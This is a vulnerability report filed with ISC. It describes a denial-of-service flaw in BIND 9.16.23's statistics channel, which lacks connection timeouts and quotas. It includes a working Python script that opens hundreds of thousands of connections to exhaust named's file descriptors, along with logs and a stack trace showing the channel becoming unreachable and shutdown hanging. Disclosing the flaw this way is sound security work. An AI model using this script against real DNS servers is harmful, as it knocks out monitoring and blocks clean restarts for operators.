Potential method to DoS the statistics channel and prevent BIND from exiting on 9.16
As reported to us in Support Ticket #21309
The submitter writes:
This ticket is being reported against BIND 9.16.23; these issues were found during code review after the (September) CVE announcement.
The implementation in lib/isc/httpd.c appears to handle the "Connection" header in the HTTP/1.0 style of persistent connections. In HTTP/1.1, persistent connections are the default, but in the lib/isc/httpd.c code this only seems to take effect once an HTTP request has been received on the connection and the appropriate flags have been set.
isc_httpdmgr_create() accepts a timermgr argument but appears to do nothing with it other than save it into a context; there are no timeouts. A client can therefore open a connection and keep it open perpetually (I've checked that this can happen). There is also no quota, so if this socket is exposed to the public internet, the question is whether this can be exploited to cause, e.g., fd exhaustion or even an OOM condition. (SO_KEEPALIVE is not set either.)
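For illustration, a minimal sketch of the kind of check used to confirm this; the address matches the statistics-channel configuration shown further below, and the idle period is arbitrary:

import socket
import time

# Open a single connection to the statistics channel, send no request at all, idle,
# and then check whether the server has closed the socket. With no server-side
# timeout and no SO_KEEPALIVE, the connection is expected to stay open.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', 5302))
time.sleep(300)                 # idle period; arbitrary

s.settimeout(1.0)
try:
    data = s.recv(1)            # b'' would mean the server closed the connection
    print('server closed the connection' if data == b'' else 'unexpected data: %r' % data)
except socket.timeout:
    print('still connected after idling; no server-side timeout observed')
finally:
    s.close()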
In practice, it appears that named does limit the number of open accepted connections on the statistics-channel socket, as the following reproduction shows.
ISC BIND 9.16.23-S1's named was run with the following configuration:
options {
    listen-on port 5300 { 127.0.0.1; };
    // ...
};
statistics-channels {
    inet * port 5302 allow { localhost; };
};
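For reference, a legitimate client of this channel issues an ordinary HTTP request. The sketch below is only illustrative; it assumes the root path serves the statistics document, which may differ between builds:

import socket

# Minimal HTTP request to the statistics channel configured above. Whether the
# connection then persists depends on the Connection-header handling in
# lib/isc/httpd.c discussed earlier.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', 5302))
s.sendall(b'GET / HTTP/1.1\r\nHost: 127.0.0.1:5302\r\n\r\n')
print(s.recv(4096).decode(errors='replace').splitlines()[0])   # HTTP status line
s.close()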
named logged the following message on startup:
21-Sep-2022 21:05:43.287 using up to 21000 sockets
A simple Python client program was run after raising the file-descriptor soft limit in the client's environment:
$ ulimit -H -n
524288
$ ulimit -S -n 512000
$ ulimit -S -n
512000
$ cat statsconnect.py
import socket
import time

sockets = []
for i in range(0, 480000):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('127.0.0.1', 5302))
    sockets.append(s)
time.sleep(3600)
$ python statsconnect.py
^CTraceback (most recent call last):
File "/home/myself/statsconnect.py", line 7, in <module>
s.connect(('127.0.0.1', 5302))
KeyboardInterrupt
$
(It was interrupted with a keyboard SIGINT.)
named logged the following message upon running statsconnect.py:
21-Sep-2022 21:13:46.799 accept: file descriptor exceeds limit (21000/21000)
After that, named still responds to DNS queries:
$ dig +tcp +short @127.0.0.1 -p 5300 . soa
a.root-servers.net. nstld.verisign-grs.com. 2022091300 1800 900 604800 86400
$
But it does not accept any more connections on the statistics-channels socket, and this persists indefinitely: even after the statsconnect.py process has exited and more than 60 seconds have passed (enough to cover any wait period before the kernel reclaims the client's file descriptors), the channel remains unreachable:
$ telnet 127.0.0.1 5302
Trying 127.0.0.1...
telnet: connect to address 127.0.0.1: Connection timed out
$
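The same check can be scripted; a sketch equivalent to the telnet attempt above (the timeout value is arbitrary):

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(15)                # generous timeout for the connect attempt
try:
    s.connect(('127.0.0.1', 5302))
    print('connected: the statistics channel is accepting connections again')
except socket.timeout:
    print('connect timed out: the statistics channel is still not accepting connections')
finally:
    s.close()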
So at least a DoS of the statistics channel appears possible.
And named does not terminate when an attempt is made to stop it:
21-Sep-2022 21:13:46.799 accept: file descriptor exceeds limit (21000/21000)
21-Sep-2022 21:29:23.296 no longer listening on 127.0.0.1#5300
21-Sep-2022 21:29:23.298 shutting down
21-Sep-2022 21:29:23.298 stopping statistics channel on 0.0.0.0#5302
and blocks there indefinitely.
pstack dumps this:
Thread 2 (Thread 0x7fd3f1893640 (LWP 431172) "isc-net-0000"):
#0 0x00007fd3f1e627b0 in __lll_lock_wait () from /lib64/libpthread.so.0
#1 0x00007fd3f1e5b6b2 in pthread_mutex_lock () from /lib64/libpthread.so.0
#2 0x00007fd3f245ee6f in isc_socket_cancel (sock=0x7fd3df675178, task=0x7fd3df670190, how=how@entry=15) at socket.c:4975
#3 0x00007fd3f2423f57 in isc_httpdmgr_shutdown (httpdmgrp=<optimized out>) at httpd.c:1094
#4 0x000000000044ee8c in shutdown_listener (listener=0x7fd3cdf41010) at statschannel.c:3773
#5 named_statschannels_shutdown (server=server@entry=0x7fd3df65f010) at statschannel.c:4156
#6 0x000000000043c505 in shutdown_server (task=<optimized out>, event=<optimized out>) at ./server.c:10144
#7 0x00007fd3f244c355 in task_run (task=0x7fd3df66a010) at task.c:857
#8 isc_task_run (task=0x7fd3df66a010) at task.c:950
#9 0x00007fd3f2436e49 in isc__nm_async_task (worker=0xc93790, ev0=0x7fd3df673970) at netmgr.c:879
#10 process_netievent (worker=worker@entry=0xc93790, ievent=0x7fd3df673970) at netmgr.c:958
#11 0x00007fd3f2436fc5 in process_queue (worker=worker@entry=0xc93790, type=type@entry=NETIEVENT_TASK) at netmgr.c:1027
#12 0x00007fd3f2437773 in process_all_queues (worker=0xc93790) at netmgr.c:798
#13 async_cb (handle=0xc93af0) at netmgr.c:827
#14 0x00007fd3f220fc0d in uv.async_io.part () from /lib64/libuv.so.1
#15 0x00007fd3f222ba84 in uv.io_poll.part () from /lib64/libuv.so.1
#16 0x00007fd3f2215630 in uv_run () from /lib64/libuv.so.1
#17 0x00007fd3f2437077 in nm_thread (worker0=0xc93790) at netmgr.c:733
#18 0x00007fd3f244e6d6 in isc__trampoline_run (arg=0xc7fc40) at trampoline.c:196
#19 0x00007fd3f1e592a5 in start_thread () from /lib64/libpthread.so.0
#20 0x00007fd3f1d81323 in clone () from /lib64/libc.so.6
Thread 1 (Thread 0x7fd3f1a17480 (LWP 431171) "named"):
#0 0x00007fd3f1d48ac5 in clock_nanosleep@GLIBC_2.2.5 () from /lib64/libc.so.6
#1 0x00007fd3f1d4dce7 in nanosleep () from /lib64/libc.so.6
#2 0x00007fd3f1d79669 in usleep () from /lib64/libc.so.6
#3 0x00007fd3f244cd2a in isc__taskmgr_destroy (managerp=0x47ba28 <named_g_taskmgr>) at task.c:1107
#4 0x00007fd3f242b381 in isc_managers_destroy (netmgrp=0x47ba08 <named_g_nm>, taskmgrp=0x47ba28 <named_g_taskmgr>) at managers.c:90
#5 0x000000000041772d in destroy_managers () at ./main.c:967
#6 cleanup () at ./main.c:1341
#7 main (argc=<optimized out>, argv=<optimized out>) at ./main.c:1613
There are 98 other threads (it is a 32-processor machine).
Since the named resolver's upstream communications still use the socketmgr, could they also be impacted by this, given that the 21000 figure is a socketmgr limit on file descriptors?
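One way to probe that question would be to issue, while statsconnect.py is holding the descriptors, a query that forces named to open upstream sockets and see whether it still succeeds. A sketch using dnspython, assuming the test instance has recursion enabled; the query name is purely illustrative:

import dns.exception
import dns.message
import dns.query
import dns.rcode

# Recursive query over TCP to the test instance; run while statsconnect.py is holding
# the file descriptors. make_query() sets the RD flag by default.
query = dns.message.make_query('example.com.', 'A')
try:
    response = dns.query.tcp(query, '127.0.0.1', port=5300, timeout=10)
    print('rcode:', dns.rcode.to_text(response.rcode()))
except dns.exception.Timeout:
    print('query timed out; upstream fetches may also be affected by the fd limit')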